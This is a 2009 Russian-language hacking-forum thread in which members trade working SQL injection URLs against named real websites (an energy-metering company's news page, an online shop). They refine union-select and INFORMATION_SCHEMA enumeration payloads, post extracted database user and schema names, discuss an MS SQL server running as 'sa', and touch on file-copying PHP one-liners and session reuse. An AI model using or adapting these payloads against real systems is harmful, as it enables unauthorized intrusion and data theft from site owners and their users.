HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.01.2009, 01:06
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
По умолчанию

как вариант выполнить пхп-код:
php -r "file_put_contents($out,file_get_contents($src ));"
 
Ответить с цитированием

  #2  
Старый 17.01.2009, 04:10
betakley
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928

Репутация: 20
По умолчанию

доброй ночи, есть вопрос, возможно глупый, но для меня важный.
если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?
 
Ответить с цитированием

  #3  
Старый 17.01.2009, 04:13
preda1or
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545

Репутация: 242
По умолчанию

Цитата:
Сообщение от betakley  
доброй ночи, есть вопрос, возможно глупый, но для меня важный.
если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?
если SSID в куках - да.
 
Ответить с цитированием

  #4  
Старый 17.01.2009, 04:28
betakley
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928

Репутация: 20
Smile

спасибо за ответ, PHPSESSID в соответствующем куке есть, значит должно сработать
 
Ответить с цитированием

  #5  
Старый 17.01.2009, 09:48
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию

Ваше не паленая такая ошибка)) а дальше что?
Цитата:
http://www.landisgyr.eu/en/pub/about/news.cfm?news_ID=-1350')+union+select+@@version--
 
Ответить с цитированием

  #6  
Старый 17.01.2009, 13:58
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от sabe  
Ваше не паленая такая ошибка)) а дальше что?
а чем проблемма то? ))
Цитата:
http://www.landisgyr.eu/en/pub/about/news.cfm?news_ID=-1350')+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES)--
 
Ответить с цитированием

  #7  
Старый 17.01.2009, 09:52
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Ребята, подскажите, как дальше, че-то не соображу:
Цитата:
http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123'

Последний раз редактировалось Octave_Parango; 17.01.2009 в 09:55..
 
Ответить с цитированием

  #8  
Старый 17.01.2009, 12:15
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
По умолчанию

Цитата:
Сообщение от Octave_Parango  
Ребята, подскажите, как дальше, че-то не соображу:
PHP код:
http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123)+UniOn+SelEct+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* 
standard:bodynz_admin@localhost:bodynz_shop
 
Ответить с цитированием

  #9  
Старый 17.01.2009, 10:26
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

Octave_Parango, четвертая ветка, union почему-то не съедает.
 
Ответить с цитированием

  #10  
Старый 17.01.2009, 18:49
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

Кто знает,в чём причина ?

(select+system_user)-- - Выводит страницу,но в гайде было сказано про
system_user(),а не system_user,но вот 1+and+1=system_user-- (Без скобок) работает.Может,я и делал неправильно,но так работает.CHAR(),к сожалению,тоже не работает.

(select+syssdlfkf_user) - Пишет ошибку

Значит,system_user существует.

LIMIT не работает,но можно через нот ин:

(select+column_name from information_schema.columns+where+table_name+not+in +(0x7573657273)-- не катит.Как потом выяснилось,с hex() тоже.

(select+column_name+from+information_schema.column s+where+table_name+not+in+(char(117)+char(115)+cha r(101)+char(114)+char(115)))

Тоже не катит.Через ТОР тоже.

db_name() работает,но не в форме (select+db_name()),а как условие:

1+and+1=db_name()

Выяснил,что всего там 12 баз данных.Сразу вспомнился гайд по эксплуатации MsSql inj здесь,на форуме.Теперь вопросы:
1)В information_schema.tables содержатся таблицы от всех 12-и баз ?На одном сервере эти таблицы или могут быть на нескольких серверах ?

2)Каков правильный синтаксис процедур в MsSql ?

3)Как выбрать поле из определённой таблицы через ТОР,как это было в случае таблиц ?

ЗЫ: Мучал сервер Microsoft SQL Server 2005 на винде со вторым сервис паком.Судя по ошибке - одноядерный )В качестве системного юзера стоит 'sa',так что на процедуры забивать пока не собираюсь )))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.